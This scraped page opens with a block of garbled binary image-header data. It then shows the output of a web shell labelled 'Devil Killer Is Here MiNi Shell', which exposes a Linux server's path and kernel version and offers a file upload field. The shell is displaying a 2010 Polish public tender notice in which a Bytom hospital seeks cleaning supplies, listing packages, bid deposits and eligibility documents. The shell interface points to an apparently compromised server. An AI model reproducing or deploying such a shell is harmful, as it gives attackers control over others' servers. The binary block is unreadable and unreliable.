JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100624/164433-N-2010.html

<p class="kh_header"><b>Bytom: Przetarg nieograniczony na zakup i dostawę środków czystości dla potrzeb Szpitala Specjalistycznego nr 2  w Bytomiu</b><br>
<b>Numer ogłoszenia: 164433 - 2010; data zamieszczenia: 24.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny Nr 2 , ul. Stefana Batorego 15, 41-902 Bytom, woj. śląskie, tel. 032 7861400, faks 032 7861646.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.szpital2.bytom.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na zakup i dostawę środków czystości dla potrzeb Szpitala Specjalistycznego nr 2  w Bytomiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia w przetargu nieograniczonym jest zakup i dostawa środków czystości określonych przez Zamawiającego według grup asortymentowo - cenowych zgrupowanych w Pakietach nr 1 - 21 stanowiących załącznik A do specyfikacji istotnych warunków zamówienia:
Pak.1   - Mydło w płynie
Pak.2   - Dozowniki na mydło w płynie ;
Pak.3   - Dozowniki przeznaczone do dozowania preparatów do odkażania    
               i mycia rąk
Pak.4   - Ręczniki jednorazowe;
Pak.5   - Podajniki na ręczniki składane;
Pak.6   - Mydło w kostkach dla niemowląt;
Pak.7   - Proszek do prania  95 0 C ;
Pak.8   - Proszek do szorowania; 
Pak.9   - Mleczko do czyszczenia;
Pak.10 - Koncentraty do mycia i czyszczenia;
Pak.11 - Pasty do podłóg;
Pak.12  - Worki foliowe
Pak.13  - Rękawice gospodarcze;
Pak.14  - Soda amoniakalna;
Pak.15  - Chloramina T;
Pak.16  - Wybielacz;
Pak.17  - Sól do zmywarek;
Pak.18  - Ścierki do mycia;
Pak.19  - Mopy do sprzątania i dezynfekcji;
Pak.20  - Akcesoria do wózka sprzątacza.
Pak.21  - Sól pastylkowa.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 24.51.31.00-4, 25.24.00.00-5, 21.24.00.00-5, 24.51.31.00-4, 24.51.32.00-5, 24.51.14.00-3, 25.22.21.00-4, 25.16.11.00-8, 24.13.33.10-1, 24.43.16.00-0, 24.51.32.00-5, 24.51.32.91-9, 17.22.58.00-3, 17.24.20.00-0, 29.71.34.10-7, 24.51.32.91-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium:
w przypadku złożenia oferty na wszystkie pakiety wadium w wysokości 4 020,90 zł. (słownie: cztery tysiące dwadzieścia zł dziewięćdziesiąt groszy),
w przypadku złożenia oferty na pakiet nr 1  wadium w wysokości 93,00 zł                        ( słownie : dziewięćdziesiąt trzy  zł.),
w przypadku złożenia oferty na pakiet nr 2 wadium w wysokości 35,60 zł                            ( słownie : trzydzieści pięć zł sześćdziesiąt zł  ).
w przypadku złożenia oferty na pakiet nr 3 wadium w wysokości 55,00 zł                           ( słownie : pięćdziesiąt pięć zł ),
w przypadku złożenia oferty na pakiet nr 4 wadium w wysokości 775,00 zł                                    ( słownie : siedemset siedemdziesiąt pięć zł ),
w przypadku złożenia oferty na pakiet nr 5  wadium w wysokości 36,00 zł                             ( słownie : trzydzieści sześć zł ),
w przypadku złożenia oferty na pakiet nr 6  wadium w wysokości 48,50 zł                           ( słownie : czterdzieści osiem zł pięćdziesiąt gr.  zł ),
	w przypadku złożenia oferty na pakiet nr 7  wadium w wysokości 570,00 zł                             ( słownie : pięćset siedemdziesiąt  zł),
	w przypadku złożenia oferty na pakiet nr 8  wadium w wysokości 19,70 zł                                ( słownie : dziewiętnaście zł  siedemdziesiąt gr.),
	w przypadku złożenia oferty na pakiet nr 9  wadium w wysokości 27,00 zł                           ( słownie : dwadzieścia siedem )
w przypadku złożenia oferty na pakiet nr 10  wadium w wysokości 984,00 zł                             ( słownie : dziewięćset osiemdziesiąt cztery zł ),
w przypadku złożenia oferty na pakiet nr 11  wadium w wysokości 53,00 zł                          ( słownie : pięćdziesiąt trzy  zł ),
	w przypadku złożenia oferty na pakiet nr 12  wadium w wysokości 713,00 zł                             ( słownie : siedemset trzynaście zł.),
	w przypadku złożenia oferty na pakiet nr 13  wadium w wysokości 27,00 zł                            ( słownie : dwadzieścia siedem zł ),
	w przypadku złożenia oferty na pakiet nr 14  wadium w wysokości 115,00 zł                              ( słownie : sto piętnaście   zł ),
	w przypadku złożenia oferty na pakiet nr 15  wadium w wysokości 72,60 zł                              ( słownie : siedemdziesiąt dwa zł sześćdziesiąt gr. ),
	w przypadku złożenia oferty na pakiet nr 16  wadium w wysokości 5,60 zł                           ( słownie : pięć  zł sześćdziesiąt gr.),
	w przypadku złożenia oferty na pakiet nr 17  wadium w wysokości 14,00 zł                            ( słownie : czternaście zł  gr.),
	w przypadku złożenia oferty na pakiet nr 18  wadium w wysokości 54,00 zł                           ( słownie : pięćdziesiąt cztery zł ),
	w przypadku złożenia oferty na pakiet nr 19  wadium w wysokości 219,00 zł                           ( słownie : dwieście dziewiętnaście zł),
	w przypadku złożenia oferty na pakiet nr 20  wadium w wysokości 28,30 zł                           ( słownie : dwadzieścia osiem zł trzydzieści gr. ),
	w przypadku złożenia oferty na pakiet nr 21  wadium w wysokości 75,60 zł                           ( słownie : siedemdziesiąt piec zł sześćdziesiąt  gr. ),</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania (art. 22 ust 1 pkt 1 pzp ), tj.: są uprawnieni do występowania w obrocie prawnym i prowadzą działalność w zakresie objętym niniejszym zamówieniem, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 1 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d)	posiadają wiedzę i doświadczenie (art. 22 ust 1 pkt 2 pzp).tj.: zrealizowali min. 2 dostawy w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia. Za jedną dostawę spełniającą powyższe wymogi ( odpowiadające swoim rodzajem i zakresem przedmiotowi zamówienia ) Zamawiający uzna dostawę wyrobów medycznych, na kwotę nie mniejszą niż wartość brutto złożonej oferty każda, zapewni termin dostawy przedmiotu zamówienia nie dłuższy niż 7 dni roboczych  po dokonaniu zamówienia przez upoważnionego pracownika Zamawiającego  - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 2 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia(art. 22 ust 1 pkt 3 pzp) tj. wykonawca musi zapewnić specjalistyczny transport Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3  do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie podlegają wykluczeniu na podstawie art. 24  pzp - Wykonawca składa dokumenty określone w § 18 ust. 1 SIWZ oraz oświadczenie będące załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>c)	znajdują się w sytuacji ekonomicznej i finansowej (art. 22 ust 1 pkt 4 pzp), - posiadają dostęp do wolnych środków finansowych lub zdolność kredytową w wysokości co najmniej takiej, jak wartość złożonej oferty, zapewnią stałość cen w okresie trwania umowy, - Wykonawca składa oświadczenie oraz dokumenty określone w § 18 ust. 3  SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	W celu potwierdzenia, ze oferowane dostawy odpowiadają wymaganiom określonym 
w Specyfikacji Istotnych Warunków Zamówienia Zamawiający wymaga:
a)	Wypełnionych i podpisanych formularzy asortymentowo - cenowych stanowiących załącznik A do SIWZ (dla każdego oferowanego pakietu),
b)	dokumentów dopuszczających do obrotu określone w § 1 ust. 2 SIWZ,
c)	etykiety, foldery, karty katalogowe oferowanego w danym pakiecie środka, a w przypadku substancji niebezpiecznej kartę charakterystyki substancji (zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 3 lipca 2002r. w sprawie karty charakterystyki substancji niebezpiecznej i preparatu niebezpiecznego ( Dz. U . nr 140 poz. 1171 z 2002r. ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpitalspec2.bytom.ids.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny numer 2 w Bytomiu , ul. ST Batorego 15 , 41-902 Bytom ( pokój nr 18 . I piętro - Zamówienia Publiczne, Budynek Dyrekcji ) lub bezpłatnie ze strony internetowej szpitala..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2010 godzina 09:00, miejsce: Szpital Specjalistyczny numer 2 w Bytomiu , ul. ST Batorego 15 , 41-902 Bytom ( pokój nr 2 . parter - Kancelaria Główna , Budynek Dyrekcji ).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pak.1   - Mydło w płynie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mydło w płynie bezbarwne ( nie zawierające barwnika ) , bezzapachowe, nie powodujące reakcji alergicznych, op. maks. 5 L 			2 600	l.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pak.2   - Dozowniki na mydło w płynie ;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dozownik na mydło w płynie , pojemność zbiornika do 500 ml, zamykany na klucz, mydło uzupełniane z karnistra, szeroki panel przyciskowy, materiał ABS, kolor biały 			40	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 25.24.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pak.3   - Dozowniki przeznaczone do dozowania preparatów do odkażania    
               i mycia rąk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	DOZOWNIK PRZEZNACZONY DO DOZOWANIA PREPARATÓW DO ODKAŹANIA I MYCIA RĄK, materiał ABS, uruchamiany przyciskiem łokciowym, bezuszczelkowy, umozliwiajacy dezynfekowanie wszystkich elementów, posiadający możliwość dawkowania preparatu, dozowanie preparatu od góry pojemnika ( eliminacja kapania i ewntualnego przeciekania), zastosowanie do pojemników o pojemności od 450 ml do 500 ml			30	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 25.24.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pak.4   - Ręczniki jednorazowe;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Ręczniki jednorazowe składane,wymiar listka 25 cm x 23 cm, gramatura papieru min 35 g/m2, makulaturowy,kolor szary 			2 800 000,00	szt. 
2.Ręczniki jednorazowe na rolce, jednowarstwowe bez wyjmowanej tulejki, średnica rolki 10 cm, szerokość rolki 20 cm, gramatura papieru min 36 g/m2, długość wstęgi ok. 35 metrów, makulaturowy			2 500,00	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 21.22.13.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pak.5   - Podajniki na ręczniki składane;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Podajniki na ręczniki składane, pojemnośc zbiornika 250-300 listków, zamykany na kluczyk, materiałABS, kolor biały			40	szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 25.24.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pak.6   - Mydło w kostkach dla niemowląt;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Mydło w kostkach dla niemowląt (białe, bezzapachowe, dopuszczone do stosowania w oddziałach noworodkowych) - 100 g. 			2 200	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.31.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pak.7   - Proszek do prania  95 0 C ;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Proszek do prania 95 stopni C ( pranie jednokapielowe zasadnicze  ) z podwójnym wybielaczem, skutecznie usuwajacy zabrudzenia organiczne oraz krew, tłuszcz, pigmenty. 			6 200	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.32.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pak.8   - Proszek do szorowania;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Proszek do szorowania (Mieszanina substancji ściernych i powierzchniowo czynnych. Przeznaczony do czyszczenia urządzeń kuchennych i sanitarnych, a także naczyń kuchennych czy glazury.)- opakowanie max. 15 kg.			300	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.14.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pak.9   - Mleczko do czyszczenia;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Mleczko do czyszczenia stosowane do wszystkich powierzchni zmywalnych tj. zlewy, kuchenki, wanny, toalety, kafelki, terakota likwidujace skutecznie trudny do usunięcia brud, nie rysujące powierzchni o właściwosciach wybielajacych  op. max 1 l.			250	L.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.51.14.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
